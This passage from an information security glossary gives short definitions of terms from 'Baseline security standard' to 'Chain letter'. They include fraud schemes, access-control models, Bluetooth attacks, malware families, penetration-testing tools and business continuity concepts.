or a genuine security
culture). Forms a sound platform, basis or foundation on which
additional security can be implemented where appropriate. May be documented in a baseline
security standard. [Baseline:] “Information and controls that
are used as a minimum implementation or starting point to provide a
consistent minimum standard of systems security and information assurance” (NZ information Security Manual).
|
|
Baseline
security standard
|
Corporate information
security standard
defining the ‘lowest common denominator’ controls i.e. the minimal
information security control requirements that are expected to be met or
exceeded in all circumstances unless formally declared exempt.
|
|
Base
station,
wireless base station
|
“Equipment that provides the connection between mobile
or cellular phones and the core communication network” (ISO/IEC 27033-6).
|
|
Bashdoor
|
See shellshock.
|
|
Basic
collection
|
CIA term for OSINT
including information
‘voluntarily disclosed’ by individuals. It is not clear what techniques are
or are not permitted to ‘encourage’ individuals to ‘volunteer’ information,
but at least the CIA acknowledges their use of both standard collection
and special
collection.
|
|
Battery
backup
|
Electronic devices
require electricity to operate normally, making them dependent on the power
supply and vulnerable
to power interruptions. For devices that are at all important, power
interruptions constitute a substantial risk, hence batteries are an important
form of control
to maintain services as long as necessary to restore the primary or standby
supply. Unfortunately, batteries bring their own risks (such as finite
capacities and lifetimes, leakage of corrosive chemicals, and explosions)
which must also be addressed. See also UPS.
|
|
Battlement
|
High walkway topping Medieval castle walls, usually crenelated,
from which defenders could fire arrows, spears, stones and pour boiling oil
on attackers
below.
|
|
Bayesian
|
Heuristic
technique based on probability
theory, originally developed by Thomas Bayes, sometimes used to identify
potential information
security events (such as spam
and malware).
|
|
Bell-LaPadula
model
|
Formal model or
architecture developed by David Elliott Bell and Leonard J. LaPadula in 1973
applies strict (mandatory) access control rules (usually expressed as ‘no read up, no
write down’ – the converse of the Biba model) and other constraints (such as the tranquillity principle) to maintain data confidentiality. Subjects (generally programs or systems) can neither read objects (generally
data) at a higher level of classification nor write to or share data with objects
or subjects at lower classification levels in the hierarchy.
|
|
BEC
(Business Email Compromise), EAC
(Email Account Compromise),
“bogus boss”,
“bogus invoice”,
MITE (Man-In-The-Email)
|
Extremely lucrative type of social engineering attack involving misuse or falsification
of email
addresses, accounts or systems
(e.g. through hacking,
spyware or
simply faking email sender addresses) to scam or defraud victims. There are many variants, for
example masquerading
as a manager or supplying a false invoice in order to trick an accounts clerk
to change the payee’s bank account, diverting funds into the fraudster’s money laundering
mechanisms. See also VEC.
|
|
Benford’s
law
|
Physicist Frank Benford realized that the digits in a set
of numbers (such as the values of corporate expense claims) tend to be
unevenly distributed, high value digits such as 9 normally occurring less
often than low ones such as 1, especially for the most significant (leftmost)
digits. Statistical analyses and tools use Benford’s law to identify data subsets with anomalous
distributions, such as expense claims by a particular worker that might have been
systematically and fraudulently
manipulated or falsified. One of several techniques for identifying
patterns, correlations, anomalies and exceptions in databases according to the nature and
distribution of the data (metadata).
|
|
Benign
|
Harmless or helpful, having beneficial or
negligible/neutral intent or consequences. Cf. malicious.
|
|
Best Current Practice
(BCP)
|
Internet Engineering Task Force’s description of a de
facto level of performance, security
etc. Serially-numbered and occasionally updated BCPs are used to document
evolving or dynamically changing practices for which static standards are
impracticable or inappropriate. Cf. Business Continuity Plan.
|
|
Best
evidence
|
The forensic
evidence originally gathered or seized from the scene of a crime
and destined to be presented in court (e.g. the defendant’s
computer) rather than forensic
copies made for forensic investigation purposes (e.g. bit-copies of
the computer hard drive). Evidence is considered ‘best’ if there is none
better. Although forensic copies may sometimes be presented in court for
various reasons (e.g. if the best evidence has unfortunately gone
missing or degraded in storage), they carry slightly less weight than the
best evidence.
|
|
Best
practice
|
By convention or common agreement, the ultimate approach.
However, since security
controls are often highly context-dependent, so-called best
practices may be inappropriate, inadequate or even detrimental in any given
situation, hence good
practice is the better term.
|
|
BHO
(Browser Helper Object)
|
Program that loads and runs automatically when Internet
Explorer is launched. Some BHOs are malicious i.e. malware.
|
|
Biba
model
|
Formal model or
architecture developed by Kenneth J. Biba in 1975 applies strict (mandatory) access control rules (usually expressed as ‘no read down, no write up’ – the converse of
the Bell–LaPadula model) to maintain data integrity. Subjects (generally programs or systems) can neither corrupt higher-level objects (generally data)
nor be corrupted by lower-level objects or subjects in the hierarchy.
|
|
Big
data
|
Huge
(multi-exabyte), rapidly changing, highly complex data sets that cannot be processed adequately with conventional database applications may require radically different approaches. Security-related
logs in large organisations may approach this scale, where
conventional data analyses intended to predict impending security threats can take so long to complete that the incidents may have already happened by the time
they are reported. Term often misused by advertisers with a penchant for
hyperbole. See also UBA, SIEM, IDS/IPS and NTA.
|
|
Big
Brother
|
Name of the overbearing authoritarian establishment in
George Orwell’s dystopian novel “Nineteen eighty-four”. Euphemism for mass surveillance.
|
|
Binder
|
Hacker
term for a program that combines multiple executables within one program.
|
|
BIN
(Bank Identification
Number),
IIN
(Issuer Identification Number)
|
The first six digits of a payment card number identifying
the card issuer, hence a cracker
or carder
revealing several is indicating that he has card numbers for those
institutions.
|
|
Binding corporate rules
|
“Personal data protection policies which are adhered to
by a controller or processor established on the territory of a Member State
for transfers or a set of transfers of personal data to a controller or
processor in one or more third countries within a group of undertakings, or
group of enterprises engaged in a joint economic activity” (GDPR).
|
|
Biometric
|
Measurable physical characteristic of a person, such as
their fingerprints, DNA profile, iris or retinal pattern, palm print, ear
shape, facial shape, voice pattern, vein pattern, signature or cursive writing and typing
dynamics, that can be used as a credential to identify and/or authenticate them. Personal
information.
|
|
Biometric
data
|
“Personal data resulting from specific technical
processing relating to the physical, physiological or behavioural
characteristics of a natural person, which allow or confirm the unique
identification of that natural person, such as facial images or dactyloscopic
data” (GDPR).
|
|
BIOS
(Basic Input/Output System)
|
Low level firmware
used to interact with peripherals such as disks, keyboards and mice, complete
self-checks and initiate the operating
system boot sequence on a computer. Normally supplied with the
motherboard and stored on a ROM, EPROM, EEPROM or flash memory chip capable
of being updated or replaced. Deprecated
in favour of UEFI.
|
|
BIOS
password
|
Some BIOS
firmware
requires the user
to enter a password
to continue the boot sequence or access
a device. This
is meant to stop a casual thief from booting/accessing system resources, files etc. but
the control is
usually weak and easily defeated or bypassed by a competent hacker or forensics specialist.
|
|
Birthday
paradox
|
Term reflecting the counterintuitive fact that, in a random group of at
least 23 people, it is ‘likely’ (i.e. the probability is greater
than 50%) that two of them celebrate their birthdays on the same day of the
year. Has been used as the basis for a cryptanalytic attack that exploits relationships between two sets
of data (e.g. passwords and the
corresponding hash
values) where a match between any value from one set against any
value from the other set is considered significant (i.e. discovering
any valid password in an
entire password file). This is far more likely than finding a match to a
given value (e.g. finding the password for a particular user ID). A valid
concern if all entries in a fingerprint
database are scanned
for any cross-matches as opposed to scanning a particular set of prints from
a crime scene or suspect against the database.
|
|
Bit-bucket,
sinkhole
|
Notional device
or network
address to which unwanted data/traffic
can be sent. Antivirus
analysts sometimes hijack the command-and-control features of malware to send
stolen data down a sinkhole instead of going to the criminals behind the scams. See also blackhole.
|
|
BitPaymer
|
One of several species
of ransomware
in the wild in
2019 that strongly encrypts
victims’ data, coercing them into
paying a ransom
for the decryption
keys. Targets medium to
large organisations,
demanding ransoms
between ~$50k and ~$1m.
|
|
Bitwise
image,
bit copy
|
A bit-by-bit identical image copy of all readable information on
a storage medium
that includes not only conventional data
content but also metadata,
alternative streams and the unallocated spaces between data files,
past the end of file markers. Normally used for forensic purposes. May include remnants of data
left behind after files have been incompletely deleted or moved, and perhaps
(using special forensic techniques and/or hardware) data from disk sectors marked
unreadable by the firmware
or disk operating system.
|
|
Black
bag ops,
black bag operations
|
Covert
activities to penetrate,
infiltrate
or otherwise physically
compromise a target’s premises in
order to capture useful intelligence,
filling the notional swag bag. See also black ops.
|
|
Black
hat
|
Malicious,
self-serving, unethical
hacker or cracker. Cf. grey hat and white hat.
|
|
Blackhole
|
List of email
servers believed
to be pumping out spam,
used as a crude form of spam filtering (‘crude’ in that it tars all users of those servers
with the same broad brush).
|
|
Blacklist
|
List of email
addresses, email servers
(see blackhole),
URLs (see bit-bucket),
people, apps etc.
that management
deems unacceptable, banned or barred. Since the default action for unlisted
items is usually to permit
their access or
use, this control
generally fails insecure.
“A list of email senders who have previously sent spam to a user” (NIST SP800-114 rev1). Cf. whitelist.
|
|
Blackmail
|
Form of coercion
or extortion
used to force someone into doing something inappropriate, illegal or simply
against their will, for example by threatening to reveal some embarrassing
corporate or personal
secret (perhaps a previous criminal act or sexual proclivity) if they do not comply with the
blackmailer’s instructions. See also sextortion.
|
|
Black
market,
criminal underground
|
Unofficial, covert,
unregulated and untaxed commercial market for stolen property (both physical
and intellectual)
plus the knowledge,
tools, processes
(such as money laundering) and other resources of the criminal fraternity.
See also hacker
underground, Darknet
and Silk Road.
|
|
Black
ops
|
Covert
(‘blacked-out’) activities normally run by government-sponsored or state
security services to infiltrate,
undermine or otherwise compromise
an adversary,
in a manner that permits
them plausibly to deny the existence, knowledge or sponsorship of the
operation, typically because it is unethical or illegal. See also black bag ops.
|
|
Blackout,
power cut
|
Extended interruption to the power feed. Computers and
other electronic systems
without alternative power sources such as battery-backup, UPS or standby generators, will of course
fail in a blackout, potentially corrupting vital system or data files in the process as well as
interrupting services. See also dip,
brownout, surge and spike.
|
|
BlackPOS
|
Species
of POS
memory-scraping malware in the wild. Used to compromise the
US retailer Target in 2014.
|
|
Blackshades
|
Species
of malware
deceptively marketed as a $40 antivirus
and spyware
package until the criminal operation behind it was shut down by the FBI in 2014.
|
|
Black
swan event
|
Outlier/extreme/rare event which is so unusual that it
could not reasonably have been predicted using risk analysis processes and models. Metaphorical term
coined by Nassim Nicholas Taleb, originally in connection with financial management but
later applied across other fields. We humans find it difficult to even
contemplate, let alone deal rationally with black swans. Many of us struggle
even to take credible worst
case scenarios seriously.
|
|
Blaster
|
Infamous network
worm from 2003.
|
|
Bleichenbacher
|
Name of a talented Swiss cryptographer who invented a brute force attack on PKCS#1
v1.5, used by SSL.
Millions of challenges
and responses concerning the validity of the message padding are
used to determine the key.
|
|
Blended
threat,
blended attack
|
Form of attack
that combines methods,
for instance using social
engineering to dupe a target
into unwittingly infecting
their system with
malware.
|
|
Bletchley
Park
|
For most of the 20th Century, this manor house
and grounds North of London housed a top-secret UK government communications
and cryptography unit. During World War II, Alan Turing, Tommy Flowers and
team designed and built the Colossus computer to decrypt German and Japanese
traffic including Enigma. Now a fascinating museum.
|
|
Bloatware
|
Software
that has become ‘bloated’ through the incremental addition of marginally
useful functions and features, making it more complex and less secure (more vulnerable)
as a consequence.
|
|
Block
|
(a) To prevent something from taking place. (b) Unit of data, either of a
fixed size (so many bits, bytes or characters) or delineated by specific
marker sequences, characters etc. (c) “Unit in which data is
stored and retrieved on disk and tape devices” (ISO/IEC 27040).
|
|
Blockchain
|
Distributed data
architecture used to establish an auditable, high-integrity record of changes to data by linking each change in
a ledger to predecessors in the logical sequence using digital signatures.
Does not rely on a trusted
authority.
Commonly applied in cryptocurrencies such as Bitcoin.
|
|
Block
cypher
|
Symmetric
encryption algorithm that encrypts a block consisting of a
defined number of sequential plaintext
characters at a time. Cf. stream cypher.
|
|
Blooper
|
Embarrassing and often humorous human error. Variously known as a bailout,
balls-up, bloomer, blunder, boner, booboo, boob, botch, bungle, bust-up,
clanger, corpsing, gaffe, foul-up, fumble, faux
pas, goof-up, howler, mistake, screw‑up, snafu, Spoonerism, wipeout
etc. An accidental integrity
failure.
|
|
Blue-
|
Prefix in the terms that follow, implying the exploitation of Bluetooth
connections, with or without the device
owner’s authorisation
and/or knowledge.
|
|
BlueBorne
|
A cluster of Bluetooth
driver spoofing
vulnerabilities,
disclosed in 2017, affecting over five billion Android, Linux and Apple devices.
|
|
Bluebugging
|
The covert
exploitation of
security vulnerabilities
in someone’s Bluetooth equipment to bug
them, for example by surreptitiously causing a compromised Bluetooth cellphone to call another
number and so transmit private
conversations in the vicinity of the compromised device.
|
|
Bluejacking
|
Sending unsolicited text, audio or video messages (e.g. spam) to a Bluetooth device. While that
may be annoying, it is essentially harmless but Bluejacking may also encompass
more sinister Bluesnarfing, Bluespying or Bluebugging attacks that involve
hijacking (taking control
of) the victim’s
device.
|
|
Bluesnarfing
|
Hacking
a Bluetooth device, violating
the user’s privacy and
potentially compromising
confidential
personal
and/or proprietary
data such as email or SMS/TXT
messages, contact details, diaries, photos/videos etc. stored on the
device.
|
|
Bluespying
|
Type of hacker
attack that exploits security vulnerabilities
on Bluetooth
equipment to spy
on the user, for
example accessing
stored GPS data to determine
where they have been.
|
|
Blue
team
|
The defensive team, tasked with protecting the enterprise
(or at least its flags)
against mock assaults by outsmarting the red team. See also purple and white team.
|
|
Bluetooth
|
Wireless networking
protocol
intended for short-range use over a few meters (e.g. to connect a
wireless headset to a mobile phone) but often accessible over longer
distances, especially with higher-power Bluetooth systems built-in to some laptops and
vehicles, and things.
Early versions of Bluetooth were notoriously insecure but even current
versions have issues. “Wireless technology standard for exchanging data
over short distances. Note: ‘Bluetooth’ is a trademark owned by the Bluetooth
SIG.” (ISO/IEC
27033-6). See also ZigBee.
|
|
Bluff
ransomware,
bluffware
|
Malware
that gives the appearance of having encrypted or otherwise blocked access to the users’ data in order to extort a ransom payment out of naïve victims, but in
reality is simply displaying the message (which typically warns against
further checks by threatening to destroy the data). A form of scareware, a social engineering
incident.
|
|
Board
of Directors
(the Board)
|
The most senior level of management within the organisation
with overarching accountability
for protecting
and legitimately
exploiting the organisation’s assets
on behalf of its owners
or other stakeholders.
The Board typically delegates responsibility
for corporate governance
including information
security to Officers such as the Executives, retaining a strategic oversight rôle.
|
|
Body
cam[era], bodycam
|
Portable CCTV
camera worn on or about a person, recording the activities of people around
or interacting with the wearer. The police are increasingly using body
cameras both to record valuable evidence
from scenes of crime and to exonerate themselves if accused of excessive
violence etc. Miniature cameras can be used for covert surveillance (i.e. spying) as well as
for more mundane activities such as recording extreme sports. See also dash cam.
|
|
Body language
|
See non-verbal
communication.
|
|
Boiler
room
|
Fraud
involving heavy promotion of over-valued or non-existent stocks and shares by
bogus stockbrokers promising big investment returns to naïve investors.
|
|
Bollard
|
Strong post mounted firmly in the ground, intended to
reduce the risk of
vehicular attacks
on a facility. A physical
security control.
|
|
Boot
sector virus
|
Form of malware
that infects
the boot sector (Master Boot Record) on a disk i.e. that part of
the disk which is accessed
first by the bootloader (itself stored in firmware) in order to load the operating system and so
start up the computer. This precedes the loading of most security software,
including old/basic antivirus
programs which execute only after the operating system has
started (modern antivirus programs load and execute at the earliest
opportunity).
|
|
Booter
|
See stresser.
|
|
Bot,
zombie
|
Short for ‘robot’. (a) Networked computer under the remote control of hackers, often compromised
using Trojans.
The owner of the
computer usually remains oblivious to the compromise. Often corralled
together in botnets.
Also known as a zombie, as in the ‘living dead’ of Hammer horror fame.
(b) Any autonomous piece of software
capable of roaming systems
and/or networks, whether for benign
(e.g. indexing Web pages for search engines) or malicious (e.g. spyware) purposes.
|
|
Bot
master, botmaster
|
Hacker
or cracker who commands and
controls a botnet.
|
|
Botnet
|
Networks
of bots that are
used for hacking/criminal
activities such as spamming,
identity theft,
carrying out DDoS attacks or as launch
pads for attacking other systems. Botnets comprising hundreds or thousands of compromised
machines are rented out to hackers
on the black market.
|
|
Botware
|
Malware
used to command
and control a bot,
for example allowing the bot
master to download, install and run a code module for a particular
type of network attack.
|
|
Bounced
|
Emails
that are undeliverable for some reason (e.g. addressee unknown)
may be returned with an explanatory note (“bounced”) or silently deleted –
the former approach helps senders but gives spammers clues about the status of email
addresses.
|
|
Bouncer
|
See security
guard.
|
|
Boundary
|
Demarcation between zones, typically where private property
abuts public land or someone else’s private property, or private networks abut
public networks, or the edge of someone’s personal space. Alternatively, the
values or other parameters that distinguish valid from invalid data. See also perimeter.
|
|
BRAIN.A
|
Widely held to have been the first personal computer virus, created in
1986 as a proof-of-concept by two Pakistani geeks who subsequently set up an
ISP called Brain Communications. Spread on floppy disks. Strictly speaking,
it was not a true virus since it did not attach itself to executable
programs, and it was pre-dated by viruses on other platforms such as Creeper
(DEC PDP-10, 1971), ANIMAL/PERVADE (Univac, 1974) and Elk Cloner (Apple II,
1981).
|
|
Brand
|
The set of commonly-held perceptions, values and beliefs
in the minds of prospects and customers about an organisation and/or its products (goods
and services) e.g. “They are trustworthy and high quality”. Whereas
logos and phrases may be trademarked,
inventions patented,
designs
registered and written/spoken words copyrighted, the intangible component of
brands makes them difficult to describe let alone protect, yet brands can be extremely
valuable, if vulnerable,
corporate information
assets. “Marketing-related intangible asset including, but not
limited to, names, terms, signs, symbols, logos and designs, or a combination
of these, intended to identify goods, services or entities, or a combination
of these, creating distinctive images and associations in the minds of
stakeholders, thereby generating economic benefits/values” (ISO
10668). See also reputation.
|
|
[Monetary] Brand value
|
“Economic value of the brand in transferable monetary
units. Note: The result obtained can be either a single economic value or a
range of values” (ISO 10668).
|
|
Breach
|
Form of information
security incident
normally involving deliberate action by someone, as opposed to those with
purely accidental
causes, for example penetrating
a defensive
barrier such as a wall or firewall,
or actively compromising
security in general.
|
|
Bribe,
bribery
|
The offered, promised or actual provision and acceptance
of illicit financial or other inducements with the expectation of favours in
return, such as the opportunity to bid favourably for or enter into a
contract, or lenience (‘turning a blind eye’) following a compliance
failure. A form of corruption
and malfeasance
that, despite being both unethical
and illegal, is an integral part of business life in some cultures
and industries.
|
|
Bricking,
PDoS
(Permanent Denial of Service)
|
To damage a device
and take it out of service in such a way that it is impossible or uneconomic
to recover it, making it ‘as useful as a brick’. May result from an accident (such as
a bug or error when updating
flash BIOS, or mechanical damage such as dropping the device in the sea) or a
deliberate attack.
|
|
BrickerBot
|
Malware
that infects things and, if
they fail a simple security test, irreparably damages their file systems,
thus bricking
them. A vigilante
worm.
|
|
Brownout
|
Reduction in power supply voltage lasting more than just a
few micro- or milliseconds, enough to dim incandescent lights (hence the
name) and cause the failure of electronic systems having inadequate voltage
regulation. See also dip,
surge, spike and blackout.
|
|
Browser
hijack
|
Malware
attack that
changes the user’s
normal browser home page or new tab selection to bring up some other inappropriate/unsafe
website.
|
|
Brute
force
|
(a) Form of cryptanalytic attack in which multiple passwords, PINs or encryption keys are entered in
rapid succession in an attempt to guess the correct one by chance, exhausting
the key space.
Often involves automated tools such as rainbow tables but may be performed
manually against low-entropy
PIN codes and weak passwords. (b) A
straightforward attack on physical security, such as ram-raiding,
chain-sawing through fences and walls, or threatening/assaulting security guards
or receptionists.
|
|
BS7858:2012
|
British Standard code of practice for pre-employment
security screening (background
checks and security
clearance).
|
|
Buffer overflow
|
Software
bug that allows – or
fails to prevent – a buffer space in memory being over-filled with excessive
amounts of data,
such that it overwrites adjacent memory locations. While this normally
results in the program simply crashing, hackers are adept at crafting malicious data in
such a way that the overspill is directly executed or points to another memory
location where exploit
code has also been inserted. Buffers are used to hold interim values and the
results of internal calculations and text operations as well as to hold data
input through the keyboard or arriving through the network: internal buffers may also be vulnerable to
overflows if unchecked.
|
|
Bug
|
(a) Programming fault accidentally inserted into a program by a
programmer. Most bugs are relatively benign but some create vulnerabilities
that may lead to security
incidents such as a crash
or compromise.
See also web bug
and flaw. (b) A covert surveillance device used to snoop surreptitiously
on the online activities, conversations etc. of a target, potentially compromising trade secrets
or personal
information.
|
|
BULLRUN
|
TOP
SECRET NSA
‘decryption program’ disclosed by whistleblower Ed Snowden. Part of a global surveillance/SIGINT framework
systematically snooping on encrypted
traffic including SSL
and (some) VPNs. A
similar program in the UK is called Edgehill.
|
|
Burglary
|
Trespass
with intent to steal.
|
|
Burp
suite, Burp
|
Network
hacking/penetration testing
tool for attacking
Web applications.
Free and commercial versions.
|
|
Business-critical,
mission-critical
|
Class
of information
asset, business function, process etc. that is vitally
important to the organisation’s
core purposes, objectives
or mission. The potential severity of information security incidents affecting such assets, the scale and nature of the impacts, implies
that realistic threats
acting on known vulnerabilities
almost certainly qualify as high risks.
See also Tier 1, 2 or 3
and safety-critical.
|
|
Business continuity
|
Term encompassing the resilience, recovery and contingency arrangements and plans used to mitigate the effects of incidents and disasters
affecting information
processes, IT systems, networks and
business processes, supply chains etc.
|
|
Business Continuity
Management (BCM)
|
The process
of directing, controlling
and overseeing
the organisation’s
approach to business
continuity, such as business
impact assessment to characterize business-critical processes and identify
the supporting systems
and resources, plus the production, exercising and maintenance of the business continuity plans
etc.
|
|
Business Continuity
Management System
(BCMS)
|
The management
system for business
continuity.
|
|
Business Continuity
Plan, Plans or Planning
(BCP)
|
A pre-considered preparative approach intended to ensure
the continued operation of essential business processes (including essential supporting
systems,
resources and so forth), despite serious incidents or disasters that might occur, through a
suitable combination of controls
such as resilience,
disaster recovery and
contingency
arrangements that will minimize the impacts. Cf. Best Current
Practice.
|
|
Business directory fraud
|
Through social engineering, fraudsters manipulate victims into over-paying for entries in
business directories, listings or databases
that are largely worthless and may not even exist. Common techniques include
persistent cold-calling and spamming,
misrepresenting
the directories, misleading websites, submitting invoices to ‘renew’ non-existent
subscriptions directly to lowly procurement or accounts clerks or personal
assistants, innocuous-looking forms using the word ‘insertions’ (meaning paid
advertisements) in the small print, inducements such as ‘free offers’ and
entries in business awards, and baseless coercive threats from self-styled ‘debt collection
agencies’.
|
|
Business Email Compromise
|
See BEC
and VEC.
|
|
Business Impact
Assessment
[or Analysis]
(BIA)
|
That part of risk analysis which involves reviewing the
potential business impacts
of more or less serious information
security incidents
on critical business processes,
in order to determine the associated availability and conceivably other
information assurance
or security requirements.
|
|
Business Resumption
(or Recovery) Plan (BRP)
|
Preparations to enable essential business activities to be
recovered or restored following a disaster that has disrupted them, typically
by providing business-critical
information
services from an alternate location.
|
|
BYOC
(Bring Your Own Cloud)
|
Corporate scheme allowing workers to use certain cloud computing
services for business purposes, provided suitable information security controls (such as policies concerning classified
information, strong user
authentication,
data encryption and
other access controls)
are employed. Unless blocked by network
security controls, cloud apps
(such as Google Docs or Office365) and cloud storage (such as Google Drive or
Dropbox) may be used by workers to exfiltrate valuable information from the organisation,
while malicious
cloud apps are a form of malware.
|
|
BYOD
(Bring Your Own Device)
|
Corporate scheme allowing workers to use their PODs for business purposes, provided
suitable information
security controls
are employed (e.g. policies,
MDM, encryption and antivirus software).
|
|
BYOT
(Bring Your Own Thing)
|
Corporate scheme allowing workers to use their things for business purposes, provided
suitable information
security controls
are employed (e.g. policies,
MDM, encryption and antivirus software).
|
|
Byzantine
fault
|
A class of system
failures with symptoms or characteristics that depend on the observer’s
perspective or context. A faulty system may generate data that differ and perhaps appear
normal to some other systems, frustrating the use of simple consensus to spot
and react to exceptions.
|
|
Byzantine
Fault Tolerance
(BFT)
|
System
architecture
designed to avoid or at
least identify
and respond
appropriately to [some types of] Byzantine fault.
|
|
Caesar’s
cipher
|
Cryptographic
algorithm
originally used by Julius Caesar to encrypt secret messages for soldiers in
the Roman colonies. A simple monoalphabetic substitution cipher, easy to break today but evidently
adequate to meet Caesar’s data
confidentiality
requirements back then. See also Vigenére’s cipher.
|
|
Cain and
Able,
“Cain”
|
Password
recovery and hacking
tool capable of brute-force
and dictionary
attacks on a wide
variety of password hashes
and cryptographic
keys, on Windows systems.
|
|
Caller
ID (identity)
|
Technical facility to display and store a phone caller’s
phone number on the called phone, enabling the recipient to identify the
caller, call them back etc. Unfortunately, the technology is not
sufficiently secure to prevent social engineers spoofing their numbers (e.g. so
fraudsters
appear to be calling from a bank’s number).
|
|
CANbus
(Controller Area Network bus)
|
Communications standards for microcontrollers (Electronic Control
Units) and other electronic devices
in vehicles, developed by Bosch. The primary security requirements in such environments
are to ensure data
and system integrity and availability.
|
|
CANVAS
|
Costly commercial network security/penetration test tool from IMMUNITY.
Automates hundreds of exploits
against known vulnerabilities.
|
|
Capability
|
Ability, competence, suitability, capacity and/or
willingness to do something successfully. “Quality of being able to
perform a given activity” (ISO 19440:2007).
|
|
Capacity
|
Capability
of an IT system, database, network, generator etc.
to deliver the required services, process
the requisite number of transactions, store sufficient data etc. Related to availability
and performance.
See also capacity
management.
|
|
Capacity management
|
Dynamically aligning the provision of IT systems and services with changing
demands, in order to maintain appropriate service levels (availability
and performance).
|
|
Capture The flag
|
See
CTF.
|
|
Carbanak
|
Bank
Trojan in-the-wild,
built using Carberp.
|
|
Carberp
|
Crimeware
kit for building Trojans.
As with Zeus, the
source code for Carberp was released onto the Internet.
|
|
Carder
|
Criminal who steals, counterfeits, trades and/or validates credit
card data.
|
|
Carding
|
Stealing, counterfeiting,
trading or validating
credit card data.
|
|
Careless
|
Without due
care, failing to act sufficiently cautiously under the
circumstances. Less severe than negligent or reckless.
|
|
Carnivore
|
Early Internet
surveillance
system
implemented by the FBI
in 1997 as PC software, capable of selectively monitoring the Internet
traffic to/from specified users
by ‘packet
sniffing’ on particular network
cables. Based on even earlier surveillance systems (such as Omnivore).
Renamed DCS1000 to appear less threatening. Superseded in 2001 by
ever more sophisticated and capable remote, distributed surveillance systems.
|
|
CARTA
(Continuous Adaptive Risk
and Trust Assessment)
|
Assurance
approach involving security monitoring that is continuous (as opposed
to periodic e.g. penetration testing),
integrated across all levels (from the hardware platform to the applications) and
adaptive (responding to risks in real time e.g. using SOAR).
Concept promoted by Gartner in 2018.
|
|
CASB
(Cloud Access Security Broker)
|
Similar to a firewall, the CASB acts as a trusted
go-between linking cloud computing users with their Cloud Service
Providers, applying security rules to the commands and data
passing through.
|
|
Cascade,
cascading failure
|
Information
security incidents
adversely affecting something (such as electricity generation) on which
something else depends (most electrical and electronic devices in that case) are likely to cause
widespread, rolling and longer-lasting disruption as the effects spread, with
additional impacts
further down the line. Therefore, incidents which harm critical infrastructure are likely to be
magnified by the consequential impacts over an extended timeframe.
|
|
Cashing
out
|
Hacker
phrase for the process
of converting “hot” (stolen) information assets into untraceable cash
through various black
market trades and money laundering schemes. See also monetize.
|
|
CATNAP
(Cheapest Available Technology/Technique Narrowly
Avoiding Prosecution)
|
Spending the least amount necessary to satisfy the letter
of the law, where there is no apparent business advantage in going any
further. A drawback of setting low hurdles in compliance-driven cultures.
|
|
Caveat
|
Warning or proviso. “A marking that indicates that the
information has special requirements in addition to those indicated by the
classification. The term covers codewords, source codewords, releasability
indicators and special-handling caveats” (NZ information Security Manual).
|
|
CBEST
|
UK financial services industry scheme, based on CREST, to accredit and
guide penetration testers
in testing banking systems.
|
|
CCM
(Cloud Controls Matrix)
|
Generic suite of information security controls applicable to various types of cloud computing
services, as defined by the CSA.
Addresses both the service providers’ and consumers’ perspectives. More.
|
|
CCPA
(California Consumer Protection Act of 2018)
|
An EU-style privacy
law comes into force in January 2020, imposing obligations on medium to large commercial
organisations to ‘implement and maintain reasonable security procedures and
practices’ in order to protect personal data (as defined in the Act) and give
Californians the right to opt
out of companies selling their personal data.
|
|
CCTV
(Closed Circuit TeleVision)
|
Private audio-visual surveillance system typically used by security guards
to monitor
premises, safes/vaults
etc. for intruders,
thieves and saboteurs,
by local councils, public bodies and the police to oversee public places for disorder,
crimes and safety issues, and by industrial plant operators to monitor the
state of the plant. Modern CCTV systems typically use high definition
digital IP cameras
on a network.
|
|
CDN
(Content Delivery Network)
|
Essentially a geographically-dispersed commercial Web
content caching service that, where possible, delivers content from copies
held on Web servers
near to the user
rather than from the original sources. Reduces latency, increases download
speeds, and can help mitigate
the effect of Denial
of Service attacks
and other incidents.
|
|
Cease
and desist letter,
demand letter,
infringement notification
|
A lawyer’s letter formally requiring someone permanently
to stop doing something, generally reinforced with an explicit or implicit threat to take legal
action against them if they persist.
|
|
Cerber
|
One of several species
of ransomware
in the wild
that surreptitiously encrypts
victims’ data, coercing them into
paying a ransom
for the decryption
keys. Evidently
does not run on Russian-language computers, hinting at its possible origin.
Available to rent as Ransomware
as a Service. Flawed
cryptosystem
in the initial version has presumably been replaced in Cerber 2.
|
|
CERT
(Computer [or Cyber] Emergency
Response Team),
CIRT
(Computer [or Cyber] Incident
Response Team)
|
An IRT
that specifically handles IT-related incidents. Many countries have national
CERTs, globally supported and coordinated through the CERT-Coordination
Center (CERT/CC) in Carnegie Mellon University’s Software Engineering
Institute.
|
|
Certification
|
The process by which something is formally evaluated
against a set of pre-defined criteria and, if appropriate, confirmed compliant. “A
procedure by which a formal assurance statement is given that a deliverable
confirms to a specified standard” (NZ information Security Manual).
|
|
Certification Authority
(CA)
|
Trusted
body that digitally
signs and issues digital certificates to authenticated
users or systems in a PKI. “Authority
trusted by one or more users to create and assign public-key certificates.
Notes: Optionally, the certification authority can create the users' keys.
The role of the certification authority in this process is to guarantee that
the individual granted the unique certificate is, in fact, who he or she
claims to be. Usually, this means that the CA has an arrangement with an
institution which provides it with information to confirm an individual's
claimed identity. CAs are a critical component in information security and
electronic commerce because they guarantee that the two parties exchanging
information are really who they claim to be.” (ISO/IEC 27033-1). “An official
with the authority to assert that a system complies with prescribed controls
within a standard” (NZ information Security Manual).
|
|
Certification body,
registrar
|
Accredited
organisation
deemed sufficiently independent, competent, diligent and trustworthy to review and certify
other organisations’ compliance
with specifications or requirements formally defined in applicable standards or
regulations such as ISO/IEC
27001. See also Certification
Authority.
|
|
Certification documents
|
Compliance
certificates, statements etc. “Documents indicating that a
client's ISMS conforms to specified ISMS standards and any supplementary
documentation required under the system” (ISO/IEC 27006).
|
|
Certification Practice Statement (CPS)
|
Policy
document
formally and explicitly defining a given PKI.
|
|
Certification report
|
“A report generated by a certification body of a Common
Criteria scheme that provides a summary of the findings of an evaluation”
(NZ information Security Manual).
|
|
Certificate Revocation
List
(CRL)
|
A published list of digital certificates that have been
revoked by the Certification
Authority and are therefore invalid. PKI systems are supposed to check for,
and handle, certificates that have been revoked, for instance if the CA has
been compromised
meaning that fake
certificates are or might be in circulation.
|
|
Certifi-Gate
|
Vulnerability
in digital
certificate handling by some privileged remote access/systems administration tools on Android, exploited by malware in 2015.
|
|
Chain
letter
|
An item of correspondence (originally a postal letter,
latterly an electronic message such as an email) entreats the recipient to pass it
on to further recipients. The content of chain letters varies and, although
some are legitimate,
most are fraudulently
using social
engineering techniques to part fools from their valuables (e.g. pyramid schemes).
Apart from consuming network
bandwidth, data
storage capacity, wasting users’
time and fooling victims,
